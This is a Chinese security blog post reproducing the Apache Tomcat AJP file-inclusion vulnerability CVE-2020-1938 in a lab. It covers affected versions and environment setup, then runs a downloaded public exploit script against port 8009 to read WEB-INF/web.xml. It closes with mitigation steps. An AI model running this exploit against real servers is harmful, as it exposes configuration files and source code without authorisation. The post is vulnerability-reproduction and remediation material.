Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

  • A+
所属分类:安全文章


一、漏洞描述:

Apache与Tomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。
Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。


二、漏洞危害:

由于Tomcat默认开启的AJP服务。端口号为8009,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。


三、漏洞影响:

Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31


四、漏洞复现:

虚拟机: centos7 + apache-tomcat-8.5.32
安装完成后使用下面的命令克隆环境
git clone https://github.com/laolisafe/CVE-2020-1938解压Apache
unzip apache-tomcat-8.5.32.zip

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

Apache的bin目录下,添加执行权限,我这里给全部权限

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

启动Apache,注意有先安装java环境
sh startup.sh

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

查看端口,8009端口是开启的

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现


漏洞利用#
下载exp
git clone 
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi,我们这里读取WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.248.129

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现


五、解决方案:

1、临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉2、配置ajp配置中的secretRequired跟secret属性来限制认证。

*参考来源:网络

PS:如果觉得本篇文章对您有所帮助,欢迎关注!帮忙点个赞,转发一下 分享出去吧,有问题可以公众号回复私聊小编,看到就会及时回复,也可加小编微信入群交流哦~~!


Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现


一起加油哦~

Apache-Tomcat-Ajp(cve-2020-1938)漏洞复现

◆Burp Suite | captcha-killer 识别图片验证码

◆Burp suite | chunked-coding-converter插件

CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞  

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: